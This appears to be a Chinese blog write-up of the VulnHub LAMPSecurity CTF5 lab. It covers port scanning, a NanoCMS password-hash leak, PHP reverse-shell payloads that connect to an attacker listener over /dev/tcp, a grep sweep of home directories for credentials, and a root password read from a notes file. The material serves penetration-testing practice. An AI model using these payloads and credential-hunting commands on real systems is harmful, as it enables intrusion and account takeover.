首页 > 其他分享 >vulnhub - LAMPSECURITY: CTF5

vulnhub - LAMPSECURITY: CTF5

时间:2024-06-15 13:32:44浏览次数:13  
标签:bin CTF5 12 LAMPSECURITY 192.168 vulnhub home password bash

vulnhub - LAMPSECURITY: CTF5

信息收集

端口扫描

nmap -sT --min-rate 10000 -p- 192.168.157.164

image-20240614164002842

详细扫描

sudo nmap -sT -sC -sV -O -p22,25,80,110,111,139,143,445,901,3306,44699 192.168.157.164

image-20240614164538787

漏洞探测

sudo nmap --script=vuln p22,25,80,110,111,139,143,445,901,3306,44699 192.168.157.164

给出来很多信息,一会可以都尝试尝试

image-20240614211412967

web渗透

先翻一翻网页

image-20240614205802829

注意到blog页面提到了NanoCMS

image-20240614205845553

搜到了一个RCE,但是需要登入账户

image-20240614210612471

搜了一下发现还有一个密码哈希信息泄露漏洞

image-20240614210756392

访问了一下还真有,泄露了admin的密码

a:12:{s:8:"homepage";s:1:"1";s:10:"links_cats";a:4:{s:7:"sidebar";a:2:{i:0;i:1;i:1;i:4;}s:11:"other-pages";a:0:{}s:14:"top-navigation";a:2:{i:0;s:1:"1";i:1;s:1:"4";}s:12:"Footer-Right";a:2:{i:0;s:1:"1";i:1;s:1:"4";}}s:5:"slugs";a:2:{i:1;s:4:"home";i:4;s:7:"contact";}s:6:"titles";a:2:{i:1;s:4:"Home";i:4;s:7:"Contact";}s:10:"slug_count";i:11;s:8:"settings";a:3:{s:19:"index-last-modified";i:1234513760;s:18:"def-template-areas";a:4:{i:0;s:12:"website name";i:2;s:14:"website slogan";i:3;s:16:"below navigation";i:4;s:16:"copyright notice";}s:18:"def-template-links";a:2:{i:0;s:14:"top-navigation";i:1;s:12:"Footer-Right";}}s:13:"active-tweaks";a:2:{i:0;s:7:"deutsch";i:1;s:19:"language-pack-tweak";}s:11:"lang-select";s:7:"english";s:6:"seourl";s:1:"0";s:8:"username";s:5:"admin";s:8:"password";s:32:"9d2f75377ac0ab991d40c91fd27e52fd";s:7:"version";s:4:"v_4f";}

image-20240614211030055

成功获得密码shannon

可以登录,但是网页加载缓慢

image-20240614212237532

这里不知道什么缘故我的本地浏览器一直登不上,kali内的浏览器可以

找到代码执行位置反弹shell

<?php system("bash -i > /dev/tcp/192.168.157.161/7777 0>&1");?> 
或
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.157.161/7777 0>&1'"); ?>

image-20240614214848233

保存后回到blog首页点击home触发

image-20240614214918557

这里也能看出两种shell的区别

提权

cat /etc/passwd

主要关注以下用户

patrick:x:500:500:Patrick Fair:/home/patrick:/bin/bash
jennifer:x:501:501:Jennifer Sea:/home/jennifer:/bin/bash
andy:x:502:502:Andrew Carp:/home/andy:/bin/bash
loren:x:503:503:Loren Felt:/home/loren:/bin/bash
amy:x:504:504:Amy Pendelton:/home/amy:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash

搜索记录

grep -R -i pass /home/* 2>/dev/null

image-20240615130227773

查看可疑文件

bash-3.2$ cat /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note
<?xml version="1.0" encoding="utf-8"?>
<note version="0.2" xmlns:link="http://beatniksoftware.com/tomboy/link" xmlns:size="http://beatniksoftware.com/tomboy/size" xmlns="http://beatniksoftware.com/tomboy">
  <title>Root password</title>
  <text xml:space="preserve"><note-content version="0.1">Root password

Root password

50$cent</note-content></text>
  <last-change-date>2012-12-05T07:24:52.7364970-05:00</last-change-date>
  <create-date>2012-12-05T07:24:34.3731780-05:00</create-date>
  <cursor-position>15</cursor-position>
  <width>450</width>
  <height>360</height>
  <x>0</x>
  <y>0</y>
  <open-on-startup>False</open-on-startup>
</note>

50$cent应该就是root的密码,提升为tty后登入root

python -c "import pty;pty.spawn('/bin/sh')"

image-20240615131328259

标签:bin,CTF5,12,LAMPSECURITY,192.168,vulnhub,home,password,bash
From: https://www.cnblogs.com/Mar10/p/18249234

相关文章

  • vulnhub - BREACH: 1
    vulnhub-BREACH:1描述作为多部分系列中的第一部分,Breach1.0旨在成为初学者到中级的boot2root/CTF挑战。解决将需要可靠的信息收集和持久性相结合。不遗余力。VM配置了静态IP地址(192.168.110.140),因此您需要将主机专用适配器配置到此子网。非常感谢knightmare和......
  • vulnhub - hackme1
    vulnhub-hackme1信息收集端口扫描详细扫描目录扫描跟漏洞探测没发现什么可用信息,除了登录还有一个uploads目录应该是进入后台之后才能使用web主页是个登录注册页面,爆了一下admin没进去,随便注册个账户登入SQL注入点击search按钮发现是个书本目录,这个结构很容易想到sql......
  • VulnHub - breach系列:breach-2.1
    VulnHub-breach系列:breach-2.1靶机描述Breach2.0是多部分系列中的第二部分,是一项boot2root/CTF挑战,旨在展示真实场景,沿途充满了曲折和恶作剧。VM配置了静态IP(192.168.110.151),因此您需要将主机适配器配置到此子网。抱歉!最后一个使用静态IP......
  • Vulnhub靶场:NAPPING: 1.0.1
    1.环境搭建靶机下载:Napping:1.0.1~VulnHub将靶机导入到OracleVMVirtualBox中,网络设置仅主机模式,和kali使用相同的网卡开启靶机2.渗透过程使用nmap工具扫描进行主机发现扫描nmap-sn192.168.56.0/24发现靶机ip地址,使用nmap工具进行端口扫描nmap-sS192.16......
  • 『vulnhub系列』HMS-1
    『vulnhub系列』HMS?-1下载地址:https://www.vulnhub.com/entry/hms-1,728/信息搜集:使用nmap进行存活主机探测,发现开启了21端口(ftp)和22端口(ssh)匿名登录ftp看看里面有什么东西,发现什么都没有ftp192.168.199.133#使用anonymous登录,无需输入密码进行全面扫描,发现开启了70......
  • 『vulnhub系列』Hack Me Please-1
    『vulnhub系列』HackMePlease-1下载地址:https://www.vulnhub.com/entry/hack-me-please-1,731/信息搜集:使用nmap进行探测存活主机,发现主机开启了80端口和3306端口nmap192.168.0.*访问80端口的web服务使用dirsearch扫描目录,但是并没有可以访问的页面dirsearch-u"h......
  • 『vulnhub系列』EVILBOX-ONE
    『vulnhub系列』EVILBOX-ONE下载地址:https://www.vulnhub.com/entry/evilbox-one,736/信息搜集:使用nmap探测内网存活主机,发现开启了22和80端口nmap192.168.0.*访问80端口web服务,发现apache默认页面使用dirsearch进行目录爆破dirsearch-u"http://192.168.0.131"......
  • 『vulnhub系列』Deathnote-1
    『vulnhub系列』Deathnote-1下载地址:https://www.vulnhub.com/entry/deathnote-1,739/信息搜集:使用nmap扫描存活主机,发现主机开启了22端口和80端口nmap192.168.0.*访问80端口的web服务,发现apache默认页面使用dirsearch进行目录扫描dirsearch-u"http://192.168.0.1......
  • 『vulnhub系列』BEELZEBUB- 1 96692f0bce834b9f85ce4fb6710ae52d
    『vulnhub系列』BEELZEBUB-1下载地址:https://www.vulnhub.com/entry/beelzebub-1,742/信息搜集:使用nmap扫描存活主机,发现主机开启了22和80端口nmap192.168.0.*访问80端口的web服务,发现是apache的默认页面使用dirsearch扫描目录dirsearch-u"http://192.168.0.140/"......
  • 『vulnhub系列』doubletrouble-1
    『vulnhub系列』doubletrouble-1下载地址https://www.vulnhub.com/entry/doubletrouble-1,743/信息搜集使用命令,获得存活靶机IP为138,开启端口22和80nmap192.168.0.*#因为当前NAT模式,攻击机和靶机在一个内网环境中访问80的web服务,是一个登录页面又是qdPm,之前做过一个q......